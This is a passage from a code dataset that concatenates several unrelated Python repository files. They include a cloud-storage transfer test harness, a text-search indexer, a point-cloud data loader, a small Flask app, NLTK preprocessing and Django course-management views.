{self.prefix}/{source}\")\n # Set a large chunk size to ensure that the API doesn't try to break\n # up the file into multiple transfers.\n size = 100*1024*1024\n if self.prefix == \"\":\n blob = self.bucket.blob(f\"{source}\", chunk_size=size)\n else:\n blob = self.bucket.blob(f\"{self.prefix}/{source}\", chunk_size=size)\n blob.upload_from_filename(temp_dir / source)\n\n\nclass BotoUploader(Uploader):\n \"\"\"Uploader using the Boto object store API.\n\n Should work for AWS S3 or Google Cloud Storage or MinIO.\"\"\"\n\n def __init__(self, dest: str):\n import boto3\n host, self.bucket, self.prefix = dest.split(\"/\", 2)\n logging.info(f\"boto: opening host {host}, saving bucket {self.bucket}\"\n f\", prefix '{self.prefix}'\")\n self.client = boto3.client('s3')\n self.client.put_object(Bucket=self.bucket, Key=\".null\",\n Body=b\"\", ContentLength=0)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"boto: uploading to {self.prefix}/{source}\")\n self.client.upload_file(temp_dir / source,\n self.bucket, f\"{self.prefix}/{source}\")\n\n\nclass MinioUploader(Uploader):\n \"\"\"Uploader using the MinIO object store API.\"\"\"\n\n def __init__(self, dest: str):\n from minio import Minio\n host, self.bucket, self.prefix = dest.split(\"/\", 2)\n logging.info(f\"minio: opening host {host}, saving bucket {self.bucket}\"\n f\", prefix '{self.prefix}'\")\n self.conn = Minio(host)\n self.conn.put_object(self.bucket, \".null\", BytesIO(b\"\"), 0)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"minio: uploading to {self.prefix}/{source}\")\n self.conn.fput_object(\n self.bucket,\n f\"{self.prefix}/{source}\",\n temp_dir / source\n )\n\n\nclass HttpUploader(Uploader):\n \"\"\"Uploader using HTTP PUT to an ordinary web server.\"\"\"\n\n def __init__(self, dest: str):\n import requests\n logging.info(f\"http: opening session to {dest}\")\n self.url = dest\n self.session = requests.Session()\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"http: putting to {self.url}/{source}\")\n with (temp_dir / source).open(\"rb\") as s:\n r = self.session.put(f\"{self.url}/{source}\", data=s)\n r.raise_for_status()\n\n\nclass BbcpUploader(Uploader):\n \"\"\"Uploader using bbcp to a remote filesystem.\"\"\"\n\n def __init__(self, dest: str):\n self.host, path = dest.split(\"/\", 1)\n logging.info(f\"bbcp: saving host {self.host} and path {path}\")\n self.path = Path(path)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"bbcp: dir {self.path / source.parent}; file {source}\")\n # -A is supposed to create the remote directory, but it appears to be\n # buggy.\n subprocess.run([\"bbcp\", \"-A\", self.path / source,\n f\"{self.host}:{self.path / source}\"])\n\n\nclass ScpUploader(Uploader):\n \"\"\"Uploader using scp to a remote filesystem.\"\"\"\n\n def __init__(self, dest: str):\n self.host, path = dest.split(\"/\", 1)\n logging.info(f\"scp: saving host {self.host} and path {path}\")\n self.path = Path(path)\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"scp: dir {self.path / source.parent}; file {source}\")\n with (temp_dir / source).open(\"rb\") as s:\n # We may have to create the remote directory; try to do it all in\n # one ssh connection for efficiency.\n subprocess.run([\"ssh\", self.host,\n f\"mkdir -p {self.path / source.parent};\"\n f\"cat > {self.path / source}\"],\n stdin=s)\n\n\ndef simulate(\n ccd_name: str,\n starttime: str,\n destination: str,\n interval: int,\n tempdir: Path,\n numexp: int,\n inputfile: Path,\n compress: bool,\n) -> None:\n \"\"\"Simulate a series of CCD image transfers.\n\n Parameters\n ----------\n ccd_name: `str`\n Name of the CCD to simulate transferring.\n starttime: `str`\n Time in HH:MM to start transferring.\n destination: `str`\n Destination URI.\n interval: `int`\n Interval between transfers in seconds.\n tempdir: `pathlib.Path`\n Temporary directory to use.\n numexp: `int`\n Number of exposures to simulate.\n inputfile: `pathlib.Path`\n Path to input image file (same one used for all transfers).\n compress: `bool`\n Compress the input if True.\n \"\"\"\n # Make sure the CCD name is in the log messages to distinguish between\n # processes.\n logging.basicConfig(\n format=f\"{ccd_name}\" + \" {asctime} {message}\",\n style=\"{\",\n level=\"INFO\"\n )\n\n # Check socket options.\n print(f\"Socket opts = {HTTPConnection.default_socket_options}\")\n\n hour, minute = starttime.split(\":\")\n # Pick a sequence number that will not overlap with other runs.\n seqnum_start = int(hour + minute) * 10\n\n uploader = Uploader.create(destination)\n\n waiter = Waiter(int(hour), int(minute), interval)\n\n now = datetime.now()\n obs_day = now.strftime(\"%Y%m%d\")\n obs_day_str = now.strftime(\"%Y-%m-%d\")\n\n with tempfile.TemporaryDirectory(dir=tempdir) as temp_dir:\n logging.info(f\"Using temp directory {temp_dir}\")\n temp_path = Path(temp_dir)\n for i in range(numexp):\n waiter.wait_exposure(i)\n seqnum = seqnum_start + i\n source_path = inputfile\n\n dest_path = Path(obs_day_str).joinpath(\n f\"{obs_day}{seqnum:05d}\",\n f\"MC_O_{obs_day}_{seqnum:05d}_{ccd_name}.fits\"\n )\n logging.info(f\"Copying from {source_path} to\"\n f\" {temp_path / dest_path}\"\n f\" with compress = {compress}\")\n dest_path = copy(source_path, temp_path, dest_path, compress)\n uploader.transfer(temp_path, dest_path)\n\n\ndef main():\n \"\"\"Main program.\"\"\"\n\n # Set up Google credentials if needed.\n if \"APXFR_KEY\" in os.environ:\n print(\"Using APXFR_KEY credentials\")\n with open(\"/root/secret.json\", \"w\") as f:\n print(os.environ[\"APXFR_KEY\"], file=f)\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/root/secret.json\"\n\n # Build and use the argument parser.\n parser = build_parser()\n args = parser.parse_args()\n\n # Figure out a node number that we can use to create a unique CCD name.\n host_name = socket.gethostname()\n node_match = re.search(r'-(\\d+)$', host_name)\n if node_match:\n node_num = int(node_match[1])\n else:\n node_match = re.search(r'-(\\w{5})$', host_name)\n if node_match:\n node_num = int(node_match[1], 36)\n else:\n node_match = re.search(r'(\\d+)', host_name)\n if node_match:\n node_num = int(node_match[1])\n else:\n node_num = 0\n\n # Private network for Google Cloud Storage requires pointing the\n # well-known API hostname to an internal IP address. In a container, we\n # can append to /etc/hosts; on bare metal, this needs to be handled\n # externally.\n if args.private:\n print(\"Using private network\")\n with open(\"/etc/hosts\", \"a\") as f:\n print(f\"199.36.153.{int(node_num) % 4 + 8} storage.googleapis.com\",\n file=f)\n\n # Attempt to set HTTPConnection socket options to enable TCP keepalive.\n if args.keepalive:\n print(\"Using TCP keepalive\")\n HTTPConnection.default_socket_options += [\n (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),\n (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)\n ]\n\n # Fork a process for each CCD to be transferred.\n jobs = []\n for ccd in range(args.ccds):\n pid = os.fork()\n if pid == 0:\n simulate(\n f\"{node_num}-{ccd}\",\n args.starttime,\n args.destination,\n args.interval,\n args.tempdir,\n args.numexp,\n args.inputfile,\n args.compress\n )\n logging.info(\"Child process exiting\")\n exit(0)\n else:\n jobs.append(pid)\n # Wait for all child processes.\n for job in jobs:\n os.waitpid(job, 0)\n\n # Sleep so that container logs can be obtained more easily.\n print(\"Main process sleeping\")\n while True:\n time.sleep(1000000)\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lsst-dm/google-poc-2020","sub_path":"apxfr/src/harness.py","file_name":"harness.py","file_ext":"py","file_size_in_byte":16092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38196928804","text":"from nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urldefrag\nimport os\nimport math\nimport re\n\nALPHANUMERIC_WORDS = re.compile('[a-zA-Z0-9]+')\n\n\nclass DocumentInfo:\n def __init__(self, id, url, length):\n self._id = id\n self._url = url\n self._length = length\n\n @property\n def id(self):\n return self._id\n\n @property\n def url(self):\n return self._url\n\n @property\n def length(self):\n return self._length\n\n\n'''\nCode to parse JSON file and tokenize words alphanumerically, ignoring stopwords. Will also fix broken HTML\n'''\n\n\ndef parseFile(filePath: str):\n # filePath is a path to a JSON object file. Get the URL and content from obj file.\n with open(filePath, 'r') as file:\n json_obj = json.load(file)\n\n url = json_obj['url']\n\n # Defragging the URL\n url, fragment = urldefrag(url)\n\n # Using beautifulsoup to parse HTML content\n page_obj = BeautifulSoup(json_obj['content'], 'lxml')\n\n # Tokenizing the text and storing in dictionary. Key (token) value (frequency)\n return (pageTokenize(page_obj), url)\n\n\ndef pageTokenize(page: object):\n '''\n Tokenizes the content retrieved from BeautifulSoup's get_text().\n Returns a dictionary of the tokens as keys and frequency as values.\n This tokenizer also takes the *stems* from every token and stores it as\n keys.\n '''\n\n # Tokenizing the page and storing tokens in a list\n # regTokenizer = RegexpTokenizer(r'\\w+')\n # tokens = regTokenizer.tokenize(page.get_text())\n\n text = page.get_text()\n\n # Stemming each token and adding to a dictionary\n stemmer = PorterStemmer()\n stems = dict()\n for token in re.findall(ALPHANUMERIC_WORDS, text):\n stemmedWord = stemmer.stem(token)\n\n # Checking if it's already in the dictioanry - if it is, add by 1. If not, add a new entry\n if stemmedWord in stems:\n stems[stemmedWord] += 1\n else:\n stems[stemmedWord] = 1\n\n return stems\n\n\ndef createInvertedIndex():\n # Data structure (dictionary) to hold the inverted index in memory\n index = dict()\n\n # Dictionary to hold the mapping between page ID and url\n pageIDs = dict()\n\n pageCounter = 0\n\n # Iterating through all the inner folders in DEV folder\n path_to_inner = '../FinalSubmission/DEV/'\n for folder in os.listdir(path_to_inner):\n if folder == '.DS_Store':\n continue\n # Iterating through all the JSON files in the inner folder\n json_files = []\n\n for filename in os.listdir(os.path.join(path_to_inner, folder)):\n json_files.append(os.path.join(path_to_inner, folder, filename))\n\n for json_file in json_files:\n\n # Processing each json file\n words, url = parseFile(json_file)\n\n normalizedSum = 0\n for word, counter in words.items():\n # Squaring each word frequency and adding to normalizedSum\n normalizedSum += counter * counter\n\n # Taking the square root of the normalized sum\n normalizedSum = math.sqrt(normalizedSum)\n\n # Document Information Object\n documentInfoObj = DocumentInfo(pageCounter, url, normalizedSum)\n\n # After processing, store a mapping between the actual file and the id\n pageIDs[pageCounter] = documentInfoObj\n pageCounter += 1\n\n with open('documentLengths.txt', 'w') as f:\n for docID, infoObj in pageIDs.items():\n f.write(f'{docID},{infoObj.url},{infoObj.length}\\n')\n\n\nif __name__ == '__main__':\n createInvertedIndex()","repo_name":"andy-phu/ZotSearch-backend","sub_path":"documentLengthMaker.py","file_name":"documentLengthMaker.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2175378077","text":"import traceback\nfrom enum import Enum\n\n\nclass AutoIncrementEnum(Enum):\n def __new__(cls):\n value = len(cls.__members__) + 1\n obj = object.__new__(cls)\n obj._value_ = value\n return obj\n\n\nclass SingletonMeta(type):\n __instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls.__instances:\n cls.__instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)\n return cls.__instances[cls]\n\n\nasync def coroutine_with_no_exception(coro, f_callback=None, *args, **kwargs):\n try:\n await coro\n except BaseException as e:\n if f_callback is not None:\n f_callback(coro, e, *args, **kwargs)\n\n\ndef default_coroutine_exception_callback(_, e):\n from dist_system.logger import Logger\n Logger().log('[!] exception occurs in coroutine :', e)\n Logger().log(traceback.format_exc())\n","repo_name":"DrawML/dist-task","sub_path":"src/dist_system/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30082215560","text":"import pickle, time, warnings\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset, IterableDataset, DataLoader, Sampler, BatchSampler\n\nfrom utils.tools import Config as cfg\nfrom utils.tools import DataProcessing as DP\n\nclass PointCloudsDataset(Dataset):\n def __init__(self, dir, labels_available=True):\n self.paths = list(dir.glob(f'*.npy'))\n self.labels_available = labels_available\n\n def __getitem__(self, idx):\n path = self.paths[idx]\n\n points, labels = self.load_npy(path)\n\n points_tensor = torch.from_numpy(points).float()\n labels_tensor = torch.from_numpy(labels).long()\n\n return points_tensor, labels_tensor\n\n def __len__(self):\n return len(self.paths)\n\n def load_npy(self, path):\n r\"\"\"\n load the point cloud and labels of the npy file located in path\n\n Args:\n path: str\n path of the point cloud\n keep_zeros: bool (optional)\n keep unclassified points\n \"\"\"\n cloud_npy = np.load(path, mmap_mode='r').T\n points = cloud_npy[:,:-1] if self.labels_available else points\n\n if self.labels_available:\n labels = cloud_npy[:,-1]\n\n # balance training set\n points_list, labels_list = [], []\n for i in range(len(np.unique(labels))):\n try:\n idx = np.random.choice(len(labels[labels==i]), 8000)\n points_list.append(points[labels==i][idx])\n labels_list.append(labels[labels==i][idx])\n except ValueError:\n continue\n if points_list:\n points = np.stack(points_list)\n labels = np.stack(labels_list)\n labeled = labels>0\n points = points[labeled]\n labels = labels[labeled]\n\n return points, labels\n\nclass CloudsDataset(Dataset):\n def __init__(self, dir, data_type='npy'):\n self.path = dir\n self.paths = list(dir.glob(f'*.{data_type}'))\n self.size = len(self.paths)\n self.data_type = data_type\n self.input_trees = {'training': [], 'validation': []}\n self.input_colors = {'training': [], 'validation': []}\n self.input_labels = {'training': [], 'validation': []}\n self.input_names = {'training': [], 'validation': []}\n self.val_proj = []\n self.val_labels = []\n self.val_split = '1_'\n\n self.load_data()\n print('Size of training : ', len(self.input_colors['training']))\n print('Size of validation : ', len(self.input_colors['validation']))\n\n def load_data(self):\n for i, file_path in enumerate(self.paths):\n t0 = time.time()\n cloud_name = file_path.stem\n if self.val_split in cloud_name:\n cloud_split = 'validation'\n else:\n cloud_split = 'training'\n\n # Name of the input files\n kd_tree_file = self.path / '{:s}_KDTree.pkl'.format(cloud_name)\n sub_npy_file = self.path / '{:s}.npy'.format(cloud_name)\n\n data = np.load(sub_npy_file, mmap_mode='r').T\n\n sub_colors = data[:,3:6]\n sub_labels = data[:,-1].copy()\n\n # Read pkl with search tree\n with open(kd_tree_file, 'rb') as f:\n search_tree = pickle.load(f)\n\n # The points information is in tree.data\n self.input_trees[cloud_split].append(search_tree)\n self.input_colors[cloud_split].append(sub_colors)\n self.input_labels[cloud_split].append(sub_labels)\n self.input_names[cloud_split].append(cloud_name)\n\n size = sub_colors.shape[0] * 4 * 7\n print('{:s} {:.1f} MB loaded in {:.1f}s'.format(kd_tree_file.name, size * 1e-6, time.time() - t0))\n\n print('\\nPreparing reprojected indices for testing')\n\n # Get validation and test reprojected indices\n\n for i, file_path in enumerate(self.paths):\n t0 = time.time()\n cloud_name = file_path.stem\n\n # Validation projection and labels\n if self.val_split in cloud_name:\n proj_file = self.path / '{:s}_proj.pkl'.format(cloud_name)\n with open(proj_file, 'rb') as f:\n proj_idx, labels = pickle.load(f)\n\n self.val_proj += [proj_idx]\n self.val_labels += [labels]\n print('{:s} done in {:.1f}s'.format(cloud_name, time.time() - t0))\n\n def __getitem__(self, idx):\n pass\n\n def __len__(self):\n # Number of clouds\n return self.size\n\n\nclass ActiveLearningSampler(IterableDataset):\n\n def __init__(self, dataset, batch_size=6, split='training'):\n self.dataset = dataset\n self.split = split\n self.batch_size = batch_size\n self.possibility = {}\n self.min_possibility = {}\n\n if split == 'training':\n self.n_samples = cfg.train_steps\n else:\n self.n_samples = cfg.val_steps\n\n #Random initialisation for weights\n self.possibility[split] = []\n self.min_possibility[split] = []\n for i, tree in enumerate(self.dataset.input_colors[split]):\n self.possibility[split] += [np.random.rand(tree.data.shape[0]) * 1e-3]\n self.min_possibility[split] += [float(np.min(self.possibility[split][-1]))]\n\n def __iter__(self):\n return self.spatially_regular_gen()\n\n def __len__(self):\n return self.n_samples # not equal to the actual size of the dataset, but enable nice progress bars\n\n def spatially_regular_gen(self):\n # Choosing the least known point as center of a new cloud each time.\n\n for i in range(self.n_samples * self.batch_size): # num_per_epoch\n # t0 = time.time()\n if cfg.sampling_type=='active_learning':\n # Generator loop\n\n # Choose a random cloud\n cloud_idx = int(np.argmin(self.min_possibility[self.split]))\n\n # choose the point with the minimum of possibility as query point\n point_ind = np.argmin(self.possibility[self.split][cloud_idx])\n\n # Get points from tree structure\n points = np.array(self.dataset.input_trees[self.split][cloud_idx].data, copy=False)\n\n # Center point of input region\n center_point = points[point_ind, :].reshape(1, -1)\n\n # Add noise to the center point\n noise = np.random.normal(scale=3.5 / 10, size=center_point.shape)\n pick_point = center_point + noise.astype(center_point.dtype)\n\n if len(points) < cfg.num_points:\n queried_idx = self.dataset.input_trees[self.split][cloud_idx].query(pick_point, k=len(points))[1][0]\n else:\n queried_idx = self.dataset.input_trees[self.split][cloud_idx].query(pick_point, k=cfg.num_points)[1][0]\n\n queried_idx = DP.shuffle_idx(queried_idx)\n # Collect points and colors\n queried_pc_xyz = points[queried_idx]\n queried_pc_xyz = queried_pc_xyz - pick_point\n queried_pc_colors = self.dataset.input_colors[self.split][cloud_idx][queried_idx]\n queried_pc_labels = self.dataset.input_labels[self.split][cloud_idx][queried_idx]\n\n dists = np.sum(np.square((points[queried_idx] - pick_point).astype(np.float32)), axis=1)\n delta = np.square(1 - dists / np.max(dists))\n self.possibility[self.split][cloud_idx][queried_idx] += delta\n self.min_possibility[self.split][cloud_idx] = float(np.min(self.possibility[self.split][cloud_idx]))\n\n if len(points) < cfg.num_points:\n queried_pc_xyz, queried_pc_colors, queried_idx, queried_pc_labels = \\\n DP.data_aug(queried_pc_xyz, queried_pc_colors, queried_pc_labels, queried_idx, cfg.num_points)\n\n # Simple random choice of cloud and points in it\n elif cfg.sampling_type=='random':\n\n cloud_idx = np.random.choice(len(self.min_possibility[self.split]), 1)[0]\n points = np.array(self.dataset.input_trees[self.split][cloud_idx].data, copy=False)\n queried_idx = np.random.choice(len(self.dataset.input_trees[self.split][cloud_idx].data), cfg.num_points)\n queried_pc_xyz = points[queried_idx]\n queried_pc_colors = self.dataset.input_colors[self.split][cloud_idx][queried_idx]\n queried_pc_labels = self.dataset.input_labels[self.split][cloud_idx][queried_idx]\n\n queried_pc_xyz = torch.from_numpy(queried_pc_xyz).float()\n queried_pc_colors = torch.from_numpy(queried_pc_colors).float()\n queried_pc_labels = torch.from_numpy(queried_pc_labels).long()\n queried_idx = torch.from_numpy(queried_idx).float() # keep float here?\n cloud_idx = torch.from_numpy(np.array([cloud_idx], dtype=np.int32)).float()\n\n points = torch.cat( (queried_pc_xyz, queried_pc_colors), 1)\n\n yield points, queried_pc_labels\n\n\ndef data_loaders(dir, sampling_method='active_learning', **kwargs):\n if sampling_method == 'active_learning':\n dataset = CloudsDataset(dir / 'train')\n batch_size = kwargs.get('batch_size', 6)\n val_sampler = ActiveLearningSampler(\n dataset,\n batch_size=batch_size,\n split='validation'\n )\n train_sampler = ActiveLearningSampler(\n dataset,\n batch_size=batch_size,\n split='training'\n )\n return DataLoader(train_sampler, **kwargs), DataLoader(val_sampler, **kwargs)\n\n if sampling_method == 'naive':\n train_dataset = PointCloudsDataset(dir / 'train')\n val_dataset = PointCloudsDataset(dir / 'val')\n return DataLoader(train_dataset, shuffle=True, **kwargs), DataLoader(val_dataset, **kwargs)\n\n raise ValueError(f\"Dataset sampling method '{sampling_method}' does not exist.\")\n\nif __name__ == '__main__':\n dataset = CloudsDataset('datasets/s3dis/subsampled/train')\n batch_sampler = ActiveLearningSampler(dataset)\n for data in batch_sampler:\n xyz, colors, labels, idx, cloud_idx = data\n print('Number of points:', len(xyz))\n print('Point position:', xyz[1])\n print('Color:', colors[1])\n print('Label:', labels[1])\n print('Index of point:', idx[1])\n print('Cloud index:', cloud_idx)\n break\n","repo_name":"aRI0U/RandLA-Net-pytorch","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"78"} +{"seq_id":"72109390973","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\n\napp = Flask(__name__, static_url_path='', static_folder='')\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/test')\ndef test():\n ls =[1,2,3,4]\n return str(ls)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=80)\n\n# http://127.0.0.1","repo_name":"cxinping/PythonFullStack","sub_path":"Chapter08/flask_demo1/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"73742360573","text":"#TPP tryout V0.1 - 30 AUG\n\n#checking numbers of entries\nrawCSV = open('text.csv').read()\nsplitCSV = rawCSV.split('\"\\n\"')\nprint(len(splitCSV))\n\n\n\n#DATAFRAME\nimport pandas as pd\npd.set_option('display.max_colwidth', 100)\n\ndata = pd.read_csv('text.csv')\ndata.columns = ['text']\nprint(data.head())\n\n\n\n#REMOVE PUNCTUATION\nimport string\n\ndef remove_punct(text):\n text_nopunct = \"\".join([char for char in text if char not in string.punctuation])\n return text_nopunct\n\ndata['text_clean'] = data['text'].apply(lambda x: remove_punct(x))\nprint(data.head())\n\n\n\n#TOKENISE\nimport re\n\ndef tokenise(text):\n tokens = re.split('\\W+', text)\n return tokens\n\ndata['text_token'] = data['text_clean'].apply(lambda x: tokenise(x.lower()))\nprint(data.head())\n\n\n\n#REMOVE STOPWORDS\n# import requests\n# stopwords_list = requests.get(\"https://gist.githubusercontent.com/rg089/35e00abf8941d72d419224cfd5b5925d/raw/12d899b70156fd0041fa9778d657330b024b959c/stopwords.txt\").content\n# stopwords = set(stopwords_list.decode().splitlines()) \n\nfrom nltk.corpus import stopwords\nstopword = stopwords.words('english')\n\ndef remove_stopwords(tokenised_list):\n text = [word for word in tokenised_list if word not in stopword]\n return text\n\ndata['text_nostop'] = data['text_token'].apply(lambda x: remove_stopwords(x))\nprint(data.head())\n\n\n\n#STEMMING VS LEMMATIZING\nimport nltk\n\nps = nltk.PorterStemmer()\nwn = nltk.WordNetLemmatizer()\n\ndef stemming(tokenized_text):\n text_stemming = [ps.stem(word) for word in tokenized_text]\n return text_stemming\n\ndata['text_stemmed'] = data['text_nostop'].apply(lambda x: stemming(x))\n\ndef lemmatizing(tokenized_text):\n text_lemmatizing = [wn.lemmatize(word) for word in tokenized_text]\n return text_lemmatizing\n\ndata['text_lemmatized'] = data['text_nostop'].apply(lambda x: lemmatizing(x))\n\ndata.head()\n\n\n\n#Output a csv file\ndf = pd.DataFrame(data)\ndf.to_csv('texted.csv')","repo_name":"laiyeowming/PTT","sub_path":"tpp.py","file_name":"tpp.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26992981963","text":"import asyncio\nfrom concurrent.futures import ThreadPoolExecutor\nimport threading\n\nfrom ..carol import _retry_session\nfrom .miscellaneous import stream_data\n\n\nclass AtomicCounter:\n \"\"\"An atomic, thread-safe incrementing counter.\n\n Args:\n initial: `int` default `0`\n Initial value for the counter.\n total: `int` default `None`\n If exists, the max value that will be reached.\n\n \"\"\"\n\n def __init__(self, initial=0, total=None):\n \"\"\"Initialize a new atomic counter to given initial value.\n \"\"\"\n self.value = initial\n self.total = total\n self._lock = threading.Lock()\n\n def increment(self, num=1):\n \"\"\"Atomically increment the counter by num (default 1) and return the\n new value.\n \"\"\"\n with self._lock:\n self.value += num\n return self.value\n\n def print(self):\n # Guarantee to print only one thread each time.\n with self._lock:\n print(f'{self.value}/{self.total} sent', end='\\r')\n\n\ndef send_a(carol, session, url, data_json, extra_headers, content_type, counter):\n \"\"\"\n Helper function to be used when sending data async.\n\n Args:\n carol: requests.Session\n Carol object\n session: `requests.Session`\n Session object to handle multiple API calls.\n url: `str`\n end point to be called.\n data_json: `dict`\n The json to be send.\n extra_headers: `dict`\n Extra headers to be used in the API call\n content_type: `dict`\n Content type of the call.\n :return: None\n \"\"\"\n carol.call_api(url, data=data_json, extra_headers=extra_headers,\n content_type=content_type, session=session)\n\n counter.increment(len(data_json))\n counter.print()\n\n\nasync def send_data_asynchronous(carol, data, step_size, url, extra_headers,\n content_type, max_workers, compress_gzip):\n \"\"\"\n Helper function to send data asynchronous.\n\n Args:\n carol: `pycarol.carol.Carol`.\n Carol object\n data: `pandas.DataFrame` or `list of dict`,\n Data to be sent.\n step_size: 'int'\n Number of records per slice.\n url: 'str'\n API URI\n extra_headers: `dict`\n Extra headers to be used in the API call\n content_type: `dict`\n Content type of the call.\n max_workers: `int`\n Max number of workers of the async job\n compress_gzip: 'bool'\n If to compress the data to send\n :return:\n \"\"\"\n\n counter = AtomicCounter(total=len(data))\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n session = _retry_session(status_forcelist=[502, 429, 524, 408, 504, 598, 520, 503, 500],\n method_whitelist=frozenset(['POST']))\n # Set any session parameters here before calling `send_a`\n loop = asyncio.get_event_loop()\n tasks = [\n loop.run_in_executor(\n executor,\n send_a,\n *(carol, session, url, data_json, extra_headers, content_type, counter)\n # Allows us to pass in multiple arguments to `send_a`\n )\n for data_json, _ in stream_data(data=data,\n step_size=step_size,\n compress_gzip=compress_gzip)\n ]\n\n for _ in await asyncio.gather(*tasks):\n pass\n","repo_name":"totvslabs/pyCarol","sub_path":"pycarol/utils/async_helpers.py","file_name":"async_helpers.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"37587264382","text":"x = int(input())\ny = int(input())\nboard = []\nfor i in range(y):\n board.append(input())\n\ndoor_count = 0\n#do not check top left or bottom left (both are corners)\nfor i in range(1, y-1):\n #check left side\n if board[i][1] != \"F\":\n door_count += 1\n #check right side\n if board[i][x-2] != \"F\":\n door_count += 1\n#do not check top right or bottom right (both are corners)\nfor i in range(1, x-1):\n #check top side\n if board[1][i] != \"F\":\n door_count += 1\n #check bottom side\n if board[-2][i] != \"F\":\n door_count += 1\n\nprint(door_count)","repo_name":"justinba1010/USCCodeathon-S21-Lower","sub_path":"doorPlacement/solutions/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71925390012","text":"from django.shortcuts import render_to_response\nfrom models import Proyecto, Usuario, Curso, Alumno\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom forms import CursoForm, UsuarioForm, AlumnoForm, ProyectoForm\n\ndef listadoAlumnos(request, rol):\n listaProyectos= Proyecto.objects.all()\n \n if (rol==\"tutor\"):\n titulo = \"Alumnes Assignats\"\n elif (rol==\"coordinador\"):\n titulo = \"Gestio d'Alumnes\"\n elif (rol==\"coordinador-tutor\"):\n rol = [\"coordinador\", \"tutor\"]\n titulo = \"Alumnes de Xxxxxx Yyyyyyy Zzzzzzz\"\n \n return render_to_response('listadoAlumnos.html', {'listaProyectos': listaProyectos, 'rol': rol, 'titulo': titulo})\n\ndef listadoProfesores(request):\n listaCoordinadores = Usuario.objects.filter(rol=\"C\")\n listaTutores = Usuario.objects.filter(rol=\"T\")\n listaProfesores = Usuario.objects.filter(rol=\"P\")\n return render_to_response('listadoProfesores.html', {'listaCoordinadores': listaCoordinadores, 'listaTutores': listaTutores, 'listaProfesores': listaProfesores})\n\ndef listadoCursos(request):\n listaCursos = Curso.objects.all().order_by(\"-id\")\n return render_to_response('Cursos.html', {'listaCursos': listaCursos})\n\ndef nuevoCurso(request):\n if (request.method == \"POST\"):\n form = CursoForm(request.POST)\n if (form.is_valid()):\n listaTutores = Usuario.objects.filter(rol=\"T\")\n for tutor in listaTutores:\n tutor.rol=\"P\"\n tutor.save()\n curso_nuevo = Curso(curso = form.cleaned_data['curso'])\n curso_nuevo.save()\n \n return HttpResponseRedirect('/coordinacio/cursos')\n else:\n form = CursoForm()\n curso_actual = int(Curso.objects.order_by(\"-id\")[0].curso.split(\"/\")[0])\n \n form.initial[\"curso\"] = str(curso_actual+1)+\"/\"+str(curso_actual+2)\n return render_to_response('CursoNuevo.html', {'form': form})\n\ndef nuevoProfesor(request):\n form = UsuarioForm()\n return render_to_response('ProfesorNuevo.html', {'form': form})\n\ndef nuevoAlumno(request):\n if (request.method == \"POST\") :\n form_alumno = AlumnoForm(request.POST, prefix='alumno')\n form_proyecto = ProyectoForm(request.POST, prefix='proyecto')\n if (form_alumno.is_valid() and form_proyecto.is_valid()):\n alumno = Alumno(form_alumno)\n alumno.save()\n curso = Curso.objects.order_by(\"-id\")[0]\n proyecto = Proyecto(form_proyecto, alumno=alumno, curso=curso)\n proyecto.save()\n return HttpResponseRedirect('/coordinacio/cursos')\n else: \n form_alumno = AlumnoForm(prefix='alumno')\n form_proyecto = ProyectoForm(prefix='proyecto')\n return render_to_response('AlumnoNuevo.html', {'form_alumno': form_alumno, 'form_proyecto': form_proyecto})\n\n## BORRAR funcion y plantillas html \ndef contact(request):\n if (request.method == \"POST\" ):\n form = ContactForm(request.POST)\n if (form.is_valid()):\n tema = form.cleaned_data['tema']\n mensaje = form.cleaned_data['mensaje']\n email = form.cleaned_data.get('sender', 'landreup@gmail.com')\n return render_to_response('contact_view.html', {'tema': tema, 'mensaje': mensaje, 'email': email})\n else: \n form = ContactForm()\n return render_to_response('contact.html', {'form': form})","repo_name":"landreup/EvaluaCompleto","sub_path":"evalua/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"43643985120","text":"count=0\nclass 